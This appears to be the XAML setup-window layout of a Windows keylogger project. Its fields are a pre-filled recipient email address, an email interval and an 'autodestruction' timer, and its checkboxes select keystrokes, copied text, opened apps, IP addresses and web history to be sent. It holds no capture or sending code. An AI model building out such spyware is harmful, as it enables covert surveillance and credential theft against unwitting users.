Keylogger/Keylogger/MainWindow.xaml

<Window x:Class="Keylogger.MainWindow"
        xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
        xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
        xmlns:d="http://schemas.microsoft.com/expression/blend/2008"
        xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"
        xmlns:local="clr-namespace:Keylogger"
        mc:Ignorable="d"
        Title="MainWindow" Height="450" Width="800">
    <Grid>
        <Grid.Background>
            <ImageBrush ImageSource="/keylogger_background.jpg"/>
        </Grid.Background>
        <Button x:Name="StartTracking" Content="Start Tracking" HorizontalAlignment="Left" Margin="618,335,0,0" VerticalAlignment="Top" Width="118" Height="41" Click="StartTracking_Click"/>
        <TextBox x:Name="emailToSend" HorizontalAlignment="Left" Height="37" Margin="135,92,0,0" TextWrapping="Wrap" Text="ionescumarius1600@gmail.com" VerticalAlignment="Top" Width="378" FontSize="22"/>
        <TextBlock HorizontalAlignment="Left" Margin="9,92,0,0" TextWrapping="Wrap" Text="Email:" VerticalAlignment="Top" Height="37" Width="120" FontSize="22"/>
        <Button x:Name="emailInfo" Content="?" HorizontalAlignment="Left" Margin="548,98,0,0" VerticalAlignment="Top" Width="32" Height="27" Click="emailInfo_Click"/>
        <TextBox x:Name="timeBetweenEmails" HorizontalAlignment="Left" Height="32" Margin="291,147,0,0" TextWrapping="Wrap" VerticalAlignment="Top" Width="57" FontSize="22"/>
        <TextBlock HorizontalAlignment="Left" Margin="7,147,0,0" TextWrapping="Wrap" Text="Time between emails:" VerticalAlignment="Top" Height="32" Width="224" FontSize="22"/>
        <Button x:Name="timeInfo" Content="?" HorizontalAlignment="Left" Margin="412,152,0,0" VerticalAlignment="Top" Width="32" Height="27" Click="timeInfo_Click"/>
        <CheckBox x:Name="IpAdd" Content="Ip addresses" HorizontalAlignment="Left" Margin="26,332,0,0" VerticalAlignment="Top" Height="15" Width="101" IsChecked="True"/>
        <TextBlock HorizontalAlignment="Left" Margin="8,274,0,0" TextWrapping="Wrap" Text="Informations  to be sent:" VerticalAlignment="Top" Height="32" Width="246" FontSize="22"/>
        <CheckBox x:Name="Apps" Content="Opened apps" HorizontalAlignment="Left" Margin="132,332,0,0" VerticalAlignment="Top" IsChecked="True"/>
        <CheckBox x:Name="Keys" Content="Keys pressed" HorizontalAlignment="Left" Margin="244,335,0,0" VerticalAlignment="Top" IsChecked="True"/>
        <CheckBox x:Name="Copied" Content="Copied text" HorizontalAlignment="Left" Margin="382,338,0,0" VerticalAlignment="Top" IsChecked="True"/>
        <CheckBox x:Name="History" Content="Web history" HorizontalAlignment="Left" Margin="498,335,0,0" VerticalAlignment="Top" IsChecked="True" />
        <TextBlock HorizontalAlignment="Left" Margin="324,10,0,0" TextWrapping="Wrap" VerticalAlignment="Top" Height="37" Width="120" FontSize="22" TextAlignment="Center"><Run FontWeight="Bold" Text="Setup"/></TextBlock>
        <TextBox x:Name="timeToAutodestruction" HorizontalAlignment="Left" Height="32" Margin="291,210,0,0" TextWrapping="Wrap" VerticalAlignment="Top" Width="57" FontSize="22"/>
        <TextBlock HorizontalAlignment="Left" Margin="7,210,0,0" TextWrapping="Wrap" Text="Time to autodestruction:" VerticalAlignment="Top" Height="32" Width="245" FontSize="22"/>
        <Button x:Name="timeAutodestruction" Content="?" HorizontalAlignment="Left" Margin="412,215,0,0" VerticalAlignment="Top" Width="32" Height="27" Click="timeAutodestruction_Click" />

    </Grid>
</Window>
